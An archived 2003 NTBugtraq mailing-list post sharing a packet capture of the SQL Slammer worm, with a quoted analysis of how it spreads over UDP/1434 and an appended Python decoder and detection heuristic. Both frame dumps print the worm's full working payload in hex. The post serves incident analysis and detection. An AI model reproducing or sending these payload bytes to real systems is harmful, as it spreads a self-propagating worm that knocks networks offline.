Re: W32/SQLSlammer PACKET CAPTURE

From: Graham Rose (graham@AVINT.NET)
Date: 01/25/03

    Date:         Sat, 25 Jan 2003 10:50:54 -0330
    From: Graham Rose <graham@AVINT.NET>
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    Looks like I may have a packet capture of this. See below (IPs anonymised).
    Does anyone else have a packet capture to compare?
    Note that it looks like it's calling specific DLLs and system calls.

    -- 
    Graham Rose, CCNA
    Network Administrator
    Avalon InterConnect & Infotech Canada
    graham@infotechcanada.com
    graham@avint.net
    http://www.avint.net
    http://www.superweb.ca
    http://www.infotechcanada.com
    Frame 2 (418 on wire, 418 captured)
        Arrival Time: Jan 25, 2003 05:29:20.8317
        Time delta from previous packet: 0.000588 seconds
        Time relative to first packet: 0.000588 seconds
        Frame Number: 2
        Packet Length: 418 bytes
        Capture Length: 418 bytes
    Ethernet II
        Destination: 01:00:5e:28:66:b2 (01:00:5e:28:66:b2)
        Source: 00:04:75:96:e1:6e (3_96:e1:6e)
        Type: IP (0x0800)
    Internet Protocol
        Version: 4
        Header length: 20 bytes
        Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
            0000 00.. = Differentiated Services Codepoint: Default (0x00)
            .... ..0. = ECN-Capable Transport (ECT): 0
            .... ...0 = ECN-CE: 0
        Total Length: 404
        Identification: 0xf580
        Flags: 0x00
            .0.. = Don't fragment: Not set
            ..0. = More fragments: Not set
        Fragment offset: 0
        Time to live: 1
        Protocol: UDP (0x11)
        Header checksum: 0x6264 (correct)
        Source: xxx.xxx.xxx
        Destination: reserved-multicast-range-NOT-delegated.example.com (231.40.102.178)
    User Datagram Protocol
        Source port: 1804 (1804)
        Destination port: 1434 (1434)
        Length: 384
        Checksum: 0xcdca (correct)
    Data (376 bytes)
       0  0100 5e28 66b2 0004 7596 e16e 0800 4500   ..^(f...u..n..E.
      10  0194 f580 0000 0111 6264 c6a5 4bf4 e728   ........bd..K..(
      20  66b2 070c 059a 0180 cdca 0401 0101 0101   f...............
      30  0101 0101 0101 0101 0101 0101 0101 0101   ................
      40  0101 0101 0101 0101 0101 0101 0101 0101   ................
      50  0101 0101 0101 0101 0101 0101 0101 0101   ................
      60  0101 0101 0101 0101 0101 0101 0101 0101   ................
      70  0101 0101 0101 0101 0101 0101 0101 0101   ................
      80  0101 0101 0101 0101 0101 01dc c9b0 42eb   ..............B.
      90  0e01 0101 0101 0101 70ae 4201 70ae 4290   ........p.B.p.B.
      a0  9090 9090 9090 9068 dcc9 b042 b801 0101   .......h...B....
      b0  0131 c9b1 1850 e2fd 3501 0101 0550 89e5   .1...P..5....P..
      c0  5168 2e64 6c6c 6865 6c33 3268 6b65 726e   Qh.dllhel32hkern
      d0  5168 6f75 6e74 6869 636b 4368 4765 7454   QhounthickChGetT
      e0  66b9 6c6c 5168 3332 2e64 6877 7332 5f66   f.llQh32.dhws2_f
      f0  b965 7451 6873 6f63 6b66 b974 6f51 6873   .etQhsockf.toQhs
     100  656e 64be 1810 ae42 8d45 d450 ff16 508d   end....B.E.P..P.
     110  45e0 508d 45f0 50ff 1650 be10 10ae 428b   E.P.E.P..P....B.
     120  1e8b 033d 558b ec51 7405 be1c 10ae 42ff   ...=U..Qt.....B.
     130  16ff d031 c951 5150 81f1 0301 049b 81f1   ...1.QQP........
     140  0101 0101 518d 45cc 508b 45c0 50ff 166a   ....Q.E.P.E.P..j
     150  116a 026a 02ff d050 8d45 c450 8b45 c050   .j.j...P.E.P.E.P
     160  ff16 89c6 09db 81f3 3c61 d9ff 8b45 b48d   ........<a...E..
     170  0c40 8d14 88c1 e204 01c2 c1e2 0829 c28d   .@...........)..
     180  0490 01d8 8945 b46a 108d 45b0 5031 c951   .....E.j..E.P1.Q
     190  6681 f178 0151 8d45 0350 8b45 ac50 ffd6   f..x.Q.E.P.E.P..
     1a0  ebca                                      ..
    Frame 5 (418 on wire, 418 captured)
        Arrival Time: Jan 25, 2003 05:29:20.8326
        Time delta from previous packet: 0.000141 seconds
        Time relative to first packet: 0.001447 seconds
        Frame Number: 5
        Packet Length: 418 bytes
        Capture Length: 418 bytes
    Ethernet II
        Destination: 01:00:5e:5a:09:6f (01:00:5e:5a:09:6f)
        Source: 00:04:75:96:e1:6e (3_96:e1:6e)
        Type: IP (0x0800)
    Internet Protocol
        Version: 4
        Header length: 20 bytes
        Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
            0000 00.. = Differentiated Services Codepoint: Default (0x00)
            .... ..0. = ECN-Capable Transport (ECT): 0
            .... ...0 = ECN-CE: 0
        Total Length: 404
        Identification: 0xf599
        Flags: 0x00
            .0.. = Don't fragment: Not set
            ..0. = More fragments: Not set
        Fragment offset: 0
        Time to live: 1
        Protocol: UDP (0x11)
        Header checksum: 0xbb5c (correct)
        Source: xxx.xxx.xxx
        Destination: 235.90.9.111
    User Datagram Protocol
        Source port: 1804 (1804)
        Destination port: 1434 (1434)
        Length: 384
        Checksum: 0x26dc (correct)
    Data (376 bytes)
       0  0100 5e5a 096f 0004 7596 e16e 0800 4500   ..^Z.o..u..n..E.
      10  0194 f599 0000 0111 bb5c c6a5 4bf4 eb5a   .........\..K..Z
      20  096f 070c 059a 0180 26dc 0401 0101 0101   .o......&.......
      30  0101 0101 0101 0101 0101 0101 0101 0101   ................
      40  0101 0101 0101 0101 0101 0101 0101 0101   ................
      50  0101 0101 0101 0101 0101 0101 0101 0101   ................
      60  0101 0101 0101 0101 0101 0101 0101 0101   ................
      70  0101 0101 0101 0101 0101 0101 0101 0101   ................
      80  0101 0101 0101 0101 0101 01dc c9b0 42eb   ..............B.
      90  0e01 0101 0101 0101 70ae 4201 70ae 4290   ........p.B.p.B.
      a0  9090 9090 9090 9068 dcc9 b042 b801 0101   .......h...B....
      b0  0131 c9b1 1850 e2fd 3501 0101 0550 89e5   .1...P..5....P..
      c0  5168 2e64 6c6c 6865 6c33 3268 6b65 726e   Qh.dllhel32hkern
      d0  5168 6f75 6e74 6869 636b 4368 4765 7454   QhounthickChGetT
      e0  66b9 6c6c 5168 3332 2e64 6877 7332 5f66   f.llQh32.dhws2_f
      f0  b965 7451 6873 6f63 6b66 b974 6f51 6873   .etQhsockf.toQhs
     100  656e 64be 1810 ae42 8d45 d450 ff16 508d   end....B.E.P..P.
     110  45e0 508d 45f0 50ff 1650 be10 10ae 428b   E.P.E.P..P....B.
     120  1e8b 033d 558b ec51 7405 be1c 10ae 42ff   ...=U..Qt.....B.
     130  16ff d031 c951 5150 81f1 0301 049b 81f1   ...1.QQP........
     140  0101 0101 518d 45cc 508b 45c0 50ff 166a   ....Q.E.P.E.P..j
     150  116a 026a 02ff d050 8d45 c450 8b45 c050   .j.j...P.E.P.E.P
     160  ff16 89c6 09db 81f3 3c61 d9ff 8b45 b48d   ........<a...E..
     170  0c40 8d14 88c1 e204 01c2 c1e2 0829 c28d   .@...........)..
     180  0490 01d8 8945 b46a 108d 45b0 5031 c951   .....E.j..E.P1.Q
     190  6681 f178 0151 8d45 0350 8b45 ac50 ffd6   f..x.Q.E.P.E.P..
     1a0  ebca                                      ..
    On January 25, 2003 09:34 am, you wrote:
    I would like to revise my previous statement.
    W32/SQLSlammer, as it's being called now, does not act like SQL-Spida,
    and the mitigators to prevent SQL-Spida are not necessarily effective in
    preventing SQLSlammer.
    SQLSlammer is delivered entirely in the single connection, 367 bytes of
    attack code. It appears to be entirely memory resident, iows, it won't
    drop anything. It does not appear to take advantage of weak passwords or
    any stored procedures, it simply overflows the buffer and executes.
    Also, SQL-Spida attacked 1433, whereas this attacks UDP1434.
    If this attack is also employing the SQL Ping bounce described by David
    Litchfield last July, then this could account for the amount of
    bandwidth being consumed by this. Look in the NTBugtraq archives for
    David's email.
    There is some discussion occurring that ISPs are blocking this traffic,
    so we should see recovery relatively quickly.
    So far there have been no reports of SQL 7 or lower being affected.
    More as it's available.
    Cheers,
    Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    Delivery co-sponsored by TruSecure Corporation
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    TICSA - Anniversary Special - Limited Time
    Become TICSA certified for just $221.25 US when you register before 3/31/03
    with PROMO "TS0103" at www.2test.com.  NO membership fees, certification
    good for 2 years. Price for international delivery just $296.25 US, with
    this offer.  Offer cannot be combined with any other special and expires
    3/31/03. Visit www.trusecure.com/ticsa for full details.
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
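    As an added example (not code from the original post or from NTBugtraq): a small Python decoder for frames laid out like the two dumps above. It walks Ethernet II / IPv4 / UDP, recomputes the IPv4 header checksum (the capture reports 0x6264 for Frame 2, which the routine must reproduce), and flags datagrams that have the shape both frames share: destination UDP/1434, a single 376-byte payload, 0x04 followed by a run of 96 0x01 bytes, and the "sock" and "send" strings visible in the ASCII column. The sample frame it runs on is constructed (source 192.0.2.10 from the documentation range, inert zero filler where the capture carries code); only the 20-byte IPv4 header used for the checksum check and the destination address/MAC are taken from the Frame 2 dump.

```python
# Added example, not part of the original post: decode Ethernet II / IPv4 / UDP frames
# as the dumps above lay them out, verify the IPv4 header checksum, and flag the
# datagram shape seen in the capture.
import struct
from dataclasses import dataclass
from typing import Optional

SQL_MONITOR_PORT = 1434      # UDP/1434: the destination port in both captured frames
SLAMMER_PAYLOAD_LEN = 376    # "Data (376 bytes)" in both frames
SLAMMER_PAD_RUN = 96         # 0x04 at payload offset 0, then 0x01 x 96 (offsets 0x2b..0x8a in the dump)


def ones_complement_sum(data: bytes) -> int:
    """16-bit one's-complement sum used by the IPv4 and UDP checksums (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                      # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return total


def ipv4_checksum(header: bytes) -> int:
    """Checksum of an IPv4 header; the checksum field (bytes 10..11) is zeroed before summing."""
    zeroed = header[:10] + b"\x00\x00" + header[12:]
    return (~ones_complement_sum(zeroed)) & 0xFFFF


@dataclass
class UdpDatagram:
    src_ip: str
    dst_ip: str
    ttl: int
    src_port: int
    dst_port: int
    payload: bytes
    ip_checksum_ok: bool


def parse_frame(frame: bytes) -> Optional[UdpDatagram]:
    """Decode Ethernet II + IPv4 + UDP; return None for anything else (ARP, TCP, fragments...)."""
    if len(frame) < 14 + 20 + 8:
        return None
    if struct.unpack("!H", frame[12:14])[0] != 0x0800:          # EtherType must be IP
        return None
    ip = frame[14:]
    version, ihl = ip[0] >> 4, (ip[0] & 0x0F) * 4
    if version != 4 or ihl < 20 or len(ip) < ihl:
        return None
    total_len, _ident, flags_frag, ttl, proto, csum = struct.unpack("!HHHBBH", ip[2:12])
    if proto != 17 or flags_frag & 0x3FFF:                        # UDP only, MF clear, offset 0
        return None
    ip = ip[:total_len]                                           # drop any Ethernet padding
    udp = ip[ihl:]
    if len(udp) < 8:
        return None
    src_port, dst_port, udp_len, _udp_csum = struct.unpack("!HHHH", udp[:8])
    return UdpDatagram(
        src_ip=".".join(map(str, ip[12:16])),
        dst_ip=".".join(map(str, ip[16:20])),
        ttl=ttl, src_port=src_port, dst_port=dst_port,
        payload=udp[8:udp_len],
        ip_checksum_ok=ipv4_checksum(ip[:ihl]) == csum,
    )


def looks_like_slammer(d: UdpDatagram) -> bool:
    """Heuristic drawn from the dumps: UDP/1434, one 376-byte payload, 0x04 then a
    96-byte run of 0x01, and the 'sock' / 'send' strings further in."""
    p = d.payload
    return (d.dst_port == SQL_MONITOR_PORT
            and len(p) == SLAMMER_PAYLOAD_LEN
            and p[0] == 0x04
            and p[1:1 + SLAMMER_PAD_RUN] == b"\x01" * SLAMMER_PAD_RUN
            and b"sock" in p and b"send" in p)


def build_udp_frame(src_ip: str, dst_ip: str, src_port: int, dst_port: int,
                    payload: bytes, ttl: int = 1) -> bytes:
    """Assemble a test frame with a correct IPv4 checksum (UDP checksum left 0 = unused)."""
    udp = struct.pack("!HHHH", src_port, dst_port, 8 + len(payload), 0) + payload
    ip_wo_csum = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0xF580, 0, ttl, 17, 0,
                             bytes(map(int, src_ip.split("."))),
                             bytes(map(int, dst_ip.split("."))))
    ip = ip_wo_csum[:10] + struct.pack("!H", ipv4_checksum(ip_wo_csum)) + ip_wo_csum[12:]
    # MACs: multicast destination from Frame 2, constructed locally-administered source
    eth = bytes.fromhex("01005e2866b2") + bytes.fromhex("020000000001") + b"\x08\x00"
    return eth + ip + udp


# Constructed sample (NOT the captured worm bytes): same framing and padding pattern,
# zero filler where the capture carries code.
SAMPLE_PAYLOAD = (b"\x04" + b"\x01" * SLAMMER_PAD_RUN
                  + b"sock".ljust(100, b"\x00")
                  + b"send".ljust(SLAMMER_PAYLOAD_LEN - 1 - SLAMMER_PAD_RUN - 100, b"\x00"))
SAMPLE_FRAME = build_udp_frame("192.0.2.10", "231.40.102.178", 1804, 1434, SAMPLE_PAYLOAD)

# IPv4 header copied from the Frame 2 dump above (20 bytes starting at offset 0x0e);
# the capture reports "Header checksum: 0x6264 (correct)".
FRAME2_IP_HEADER = bytes.fromhex("45000194f580000001116264c6a54bf4e72866b2")

if __name__ == "__main__":
    d = parse_frame(SAMPLE_FRAME)
    print(f"{d.src_ip}:{d.src_port} -> {d.dst_ip}:{d.dst_port} ttl={d.ttl} "
          f"ip_csum_ok={d.ip_checksum_ok} slammer_like={looks_like_slammer(d)}")
```

    The same decoder applied to the raw bytes of either dump above (Ethernet header at offset 0, IPv4 at 0x0e, UDP at 0x22, payload at 0x2a) gives dst_port 1434, a 376-byte payload and a matching heuristic; a datagram that merely hits port 1434 with a short or differently padded payload does not match, which is the distinction a filter on the port alone cannot make.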
    

